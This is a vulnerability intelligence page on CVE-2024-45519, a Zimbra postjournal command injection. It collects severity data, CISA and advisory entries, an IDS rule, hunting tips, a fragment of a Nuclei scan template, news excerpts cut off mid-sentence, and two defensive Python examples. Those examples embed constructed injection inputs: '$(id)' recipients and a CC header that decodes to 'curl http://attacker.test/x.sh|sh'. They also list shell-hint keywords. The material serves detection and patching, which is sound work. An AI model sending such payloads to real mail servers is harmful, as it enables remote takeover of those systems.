CVE-2024-45519
Published 2024-10-02
Priority: P1 · 99 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2024-10-24
Exploited in the wild
EPSS: 99.98% (100.0th percentile)
The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synacor | zimbra_collaboration_suite | < 8.8.15 Patch 46 | 8.8.15 Patch 46 |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | >= 10.0.0 < 10.0.9 | 10.0.9 |
Detection & IOCs (extracted from sources)
snort
alert smtp any any -> [$HOME_NET,$SMTP_SERVERS] any (msg:"ET EXPLOIT Zimbra postjournal RCE Attempt Inbound (CVE-2024-45519)"; flow:established,to_server; content:"|0d 0a|RCPT|20|TO|3a 20|"; fast_pattern; content:"|24 28|"; within:200; pcre:"/^RCPT\x20TO\x3a\x20.*?\x24\x28/mi"; reference:cve,2024-45519; classtype:attempted-admin; sid:2056356; rev:2; metadata:created_at 2024_09_30, cve CVE_2024_45519, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|24 28| within RCPT TO field
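The rule above fires on `$(` (0x24 0x28) inside an `RCPT TO: ` line. The Python below is an added example, not code from the page, from Emerging Threats or from Zimbra: it applies the rule's own pcre to a client-to-server SMTP byte stream, contrasts it with a looser pattern (this example's addition, not part of the rule) that also matches the legal `RCPT TO:<addr>` spelling with no space after the colon, and base64-decodes blobs from the CC header of the DATA section to surface the reported variant that hides the command there. The session bytes, the spoofed Gmail sender and the `attacker.test` / `victim.test` hosts are constructed for the example.

```python
import base64
import re
from email.parser import BytesParser
from typing import List, Optional

# The ET rule's pcre, unchanged: "RCPT TO: " (note the space after the colon) then "$(".
RCPT_INJECTION_ET = re.compile(rb"^RCPT\x20TO\x3a\x20.*?\x24\x28", re.I | re.M)

# Looser variant (this example's addition, not part of the ET rule): any whitespace after
# RCPT, optional whitespace around the colon, so "RCPT TO:<addr>" is covered as well.
RCPT_INJECTION_LOOSE = re.compile(rb"^RCPT\s+TO\s*:\s*.*?\$\(", re.I | re.M)

# Candidate base64 blob inside a header value, and substrings that suggest a decoded shell command.
B64_BLOB = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
SHELL_HINTS = (b"$(", b"|", b";", b"bash", b"sh ", b"curl", b"wget", b"/tmp/")


def flag_rcpt_lines(session: bytes, pattern=RCPT_INJECTION_ET) -> List[bytes]:
    """Return each client line of an SMTP session that matches `pattern`."""
    return [line for line in session.split(b"\r\n") if pattern.search(line)]


def extract_data_section(session: bytes) -> Optional[bytes]:
    """Return the message sent between DATA and the lone '.' terminator, or None."""
    lines = session.split(b"\r\n")
    try:
        start = next(i for i, line in enumerate(lines) if line.upper() == b"DATA") + 1
    except StopIteration:
        return None
    body = []
    for line in lines[start:]:
        if line == b".":
            return b"\r\n".join(body) + b"\r\n"
        body.append(line)
    return None  # DATA never terminated


def decode_cc_payloads(message: bytes) -> List[bytes]:
    """Base64-decode blobs found in the CC header; keep those that read like a shell command."""
    msg = BytesParser().parsebytes(message, headersonly=True)
    cc = msg.get("CC")
    if cc is None:
        return []
    found = []
    for blob in B64_BLOB.findall(cc.encode("latin-1")):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:
            continue
        if any(hint in decoded for hint in SHELL_HINTS):
            found.append(decoded)
    return found


# Constructed client-to-server transcript (what the IDS sees in the to_server direction).
PAYLOAD = b"curl http://attacker.test/x.sh|sh"
SESSION = b"".join([
    b"EHLO relay.attacker.test\r\n",
    b"MAIL FROM:<spoofed@gmail.com>\r\n",
    b"RCPT TO: <user@victim.test>\r\n",
    b'RCPT TO: <"aab$(id)"@victim.test>\r\n',   # matched by the ET pcre
    b'RCPT TO:<"aab$(id)"@victim.test>\r\n',    # legal SMTP, no space after the colon: ET pcre misses it
    b"DATA\r\n",
    b"From: spoofed@gmail.com\r\n",
    b"To: user@victim.test\r\n",
    b'CC: <"aabbcc$(echo ' + base64.b64encode(PAYLOAD) + b'|base64 -d|bash)"@victim.test>\r\n',
    b"Subject: hello\r\n",
    b"\r\n",
    b"aaa\r\n",
    b".\r\n",
    b"QUIT\r\n",
])

if __name__ == "__main__":
    print("ET pcre hits:   ", flag_rcpt_lines(SESSION))
    print("loose pcre hits:", flag_rcpt_lines(SESSION, RCPT_INJECTION_LOOSE))
    print("CC payloads:    ", decode_cc_payloads(extract_data_section(SESSION) or b""))
```

The gap worth knowing about: the rule's content match `|3a 20|` and its pcre both require a space after the colon, so a client that sends the RFC-style `RCPT TO:<addr>` is not matched by this signature. The looser pattern closes that at the cost of more false positives on quoted local parts; neither replaces patching the service.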
- Monitor SMTP traffic for shell metacharacters (specifically '$(' — 0x24 0x28) injected into the RCPT TO field, which indicates command injection attempts against Zimbra's postjournal service.
- Attackers spoof Gmail addresses and embed base64-encoded commands in the CC field of emails sent to Zimbra SMTP servers; inspect CC headers for base64 payloads.
- Hunt for webshell activity on Zimbra servers by monitoring HTTP requests containing both JSESSIONID and JACTION cookies, which are the webshell's trigger and command-delivery mechanism.
- The exploit targets Zimbra's postjournal service on TCP port 10027; restrict or monitor access to this port from untrusted networks.
- The root cause is unsanitized input passed to popen(); patched versions replace popen() with execvp(). A postjournal binary that still references popen is a quick indicator of an unpatched build.
- Over 50,000 web-exposed Zimbra servers were reported as still vulnerable; prioritize internet-facing Zimbra instances for patching and detection coverage.
- The postjournal service is not enabled by default on all Zimbra deployments; disabling it if not required eliminates the attack surface entirely.
- Misconfigured 'mynetworks' settings can allow unauthorized external access to postjournal; ensure mynetworks is restricted to trusted hosts to limit exploitation.
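The root-cause bullet is the command-string-versus-argv split. The Python below is an added example and not Zimbra's code (postjournal is C; `/usr/sbin/sendmail` and its flags here are a hypothetical stand-in for whatever postjournal actually invokes). It shows the same two shapes: a recipient spliced into a string that a shell parses, which is what `popen()` means since it runs `/bin/sh -c`, versus an argv list, which is the `execvp()` model, together with a metacharacter guard and `shlex.quote` for the case where a shell cannot be avoided. The recipient string is constructed in the style of the reported injection.

```python
import re
import shlex
import subprocess
import sys

# Characters that make /bin/sh do something other than pass the text through verbatim.
SHELL_META = re.compile(r"""[$`|;&<>(){}\[\]*?!\\'"\s]""")

# Hypothetical delivery command; stands in for whatever postjournal hands to the MTA.
SENDMAIL = "/usr/sbin/sendmail"


def build_shell_command(rcpt: str) -> str:
    """Vulnerable shape: the recipient is spliced into text that a shell will parse.
    popen() has exactly these semantics (it runs `/bin/sh -c <string>`), so a recipient
    like '"aab$(id)"@victim.test' has $(id) expanded before sendmail ever starts.
    subprocess.run(cmd, shell=True) would be the Python spelling of popen(cmd)."""
    return f"{SENDMAIL} -i -- {rcpt}"


def build_argv(rcpt: str) -> list:
    """Hardened shape: an argv list and no shell. This is the execvp() model: the
    recipient is one argument, and '$(' is just two bytes inside it."""
    return [SENDMAIL, "-i", "--", rcpt]


def child_sees(rcpt: str) -> str:
    """Run a harmless child with the recipient as a single argv entry and return what it
    received; the interpreter stands in for sendmail so this runs anywhere Python does."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", rcpt],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.rstrip("\n")


def is_shell_safe(rcpt: str) -> bool:
    """Reject anything a shell would interpret; use this only as defence in depth."""
    return SHELL_META.search(rcpt) is None


def quote_for_shell(rcpt: str) -> str:
    """If a shell string is unavoidable, shlex.quote() keeps the recipient one literal word."""
    return shlex.quote(rcpt)


if __name__ == "__main__":
    rcpt = '"aab$(id)"@victim.test'   # constructed recipient in the reported injection style
    print("shell string:", build_shell_command(rcpt))   # sh would run id here
    print("argv:        ", build_argv(rcpt))
    print("child saw:   ", child_sees(rcpt))             # literal text, nothing expanded
    print("safe?        ", is_shell_safe(rcpt))
    print("quoted:      ", quote_for_shell(rcpt))
```

The argv form is the actual fix; the guard and the quoting are belt-and-braces for code paths that still build a shell string, and a quoted-local-part address such as the one above is valid SMTP, so rejecting it outright is a trade-off the operator has to accept.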
CVSS provenance
| Source | Score | Severity | Vector |
|---|---|---|---|
| nvd (v3.1) | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | 10.0 | CRITICAL | — |
| cisa | 9.8 | CRITICAL | — |
CISA
Synacor Zimbra Collaboration Suite (ZCS) Command Execution Vulnerability
cisa · 2024-10-03 · CVSS 9.8 · CWE-284 · CVE-2024-45519 [CRITICAL]
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Synacor Zimbra Collaboration Suite (ZCS) contains an unspecified vulnerability in the postjournal service that may allow an unauthenticated user to execute commands.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories ; https://nvd.nist.gov/vuln/detail/CVE-2024-45519
Remediation Due Date: 2024-10-24
GHSA
GHSA-fr4c-ch83-r968: The postjournal service in Zimbra Collaboration (ZCS) before 8
ghsa_unreviewed · 2024-10-03 · CWE-284 · CVE-2024-45519 [CRITICAL]
The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands.
VulnCheck
Synacor Zimbra Collaboration Suite (ZCS) Command Execution Vulnerability
vulncheck · 2024 · CVSS 10.0 · CWE-284 · CVE-2024-45519 [CRITICAL]
Synacor Zimbra Collaboration Suite (ZCS) contains an unspecified vulnerability in the postjournal service that may allow an unauthenticated user to execute commands.
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://x.com/JusticeRage/status/1841017884245438555; https://x.com/threatinsight/status/1841089939905134793; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortiguard.com/outbreak-alert/zimbra-collaboration-rce; https://cert.pl/uploads/docs/Report_CP_2024.pdf; https://www.enisa.europa.eu/sites/default/fi
Suricata
ET EXPLOIT Zimbra postjournal RCE Attempt Inbound (CVE-2024-45519)
suricata · 2024-09-30 · CVSS 10.0 · CVE-2024-45519 [CRITICAL]
Rule: alert smtp any any -> [$HOME_NET,$SMTP_SERVERS] any (msg:"ET EXPLOIT Zimbra postjournal RCE Attempt Inbound (CVE-2024-45519)"; flow:established,to_server; content:"|0d 0a|RCPT|20|TO|3a 20|"; fast_pattern; content:"|24 28|"; within:200; pcre:"/^RCPT\x20TO\x3a\x20.*?\x24\x28/mi"; reference:cve,2024-45519; classtype:attempted-admin; sid:2056356; rev:2; metadata:created_at 2024_09_30, cve CVE_2024_45519, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
Nuclei
Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution
nuclei · CVSS 9.8 · CVE-2024-45519 [CRITICAL]
Template (the head of the javascript snippet is missing from the source; the fragment resumes mid-statement):
\r\n');
conn.RecvString()
conn.Send('RCPT TO: \r\n');
conn.RecvString()
conn.Send('DATA\r\n');
conn.RecvString()
conn.Send('aaa\r\n');
conn.RecvString()
conn.Send('.\r\n');
resp = conn.RecvString()
conn.Send('QUIT\r\n');
conn.Close()
resp
args:
Host: "{{Host}}"
Port: 25
oast: "{{interactsh-url}}"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
words:
- "message delivered"
# digest: 4a0a00473045022100d2df804796f6d14d7db541eb8f1e67347069cf9ab3aafe42ba406950d562661502207241c775eba870172603a116bdb8adb113834644df32348171e99f41701112ee:922c64590222798bb761d5b6d8e72950
Securelist
Exploits and vulnerabilities in Q3 2024 (also published as "Analyzing the vulnerability landscape in Q3 2024")
blogs_securelist · 2024-12-06 · CVSS 8.1 · CVE-2024-47177 [HIGH]
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Windows and Linux vulnerability exploitation
- Most prevalent exploits
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- CVE-2024-47177 (CUPS filters)
- CVE-2024-38112 (MSHTML Spoofing)
- CVE-2024-6387 (regreSSHion)
- CVE-2024-3183 (Free IPA)
- CVE-2024-45519 (Zimbra)
- CVE-2024-5290 (Ubuntu wpa_supplicant)
- Conclusion and advice
Author: Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Common Log Filing System (CLFS) in Windows, so the number
Checkpoint
7th October – Threat Intelligence Report
blogs_checkpoint · 2024-10-07 · CVE-2024-45519
## 7th October – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 7th October, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Chinese state-sponsored hackers, dubbed “Salt Typhoon”, infiltrated US telecom companies such as Verizon, AT&T, and Lumen Technologies. The attackers gained access to systems used for court-authorized wiretaps, potentially remaining undetected for months while collecting sensitive information.
French press agency AFP has di
Bleepingcomputer
Critical Zimbra RCE flaw exploited to backdoor servers using emails
blogs_bleepingcomputer · 2024-10-02 · CVSS 10.0 · CVE-2024-45519 [CRITICAL]
## Critical Zimbra RCE flaw exploited to backdoor servers using emails
## Bill Toulas
Hackers are actively exploiting a recently disclosed RCE vulnerability in Zimbra email servers that can be triggered simply by sending specially crafted emails to the SMTP server.
The Zimbra remote code execution flaw is tracked as CVE-2024-45519 and exists in Zimbra's postjournal service, which is used to parse incoming emails over SMTP. Attackers can exploit the vulnerability by sending specially crafted emails with commands to execute in the CC field, which are then executed when the postjournal service processes the email.
The malicious activity was first reported by HarfangLab's threat researcher Ivan Kwiatkowski, who characterized it as "mass-exploitation," and was subsequently also confirmed by
Greynoiseio
NoiseLetter October 2024
blogs_greynoiseio
References
- https://wiki.zimbra.com/wiki/Security_Center
- https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.9#Security_Fixes
- https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.1#Security_Fixes
- https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P46#Security_Fixes
- https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P41#Security_Fixes
- https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
- https://blog.projectdiscovery.io/zimbra-remote-code-execution/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-45519
Timeline
- 2024-10-02: Published
- 2024-10-03: Added to CISA KEV
- Exploited in the wild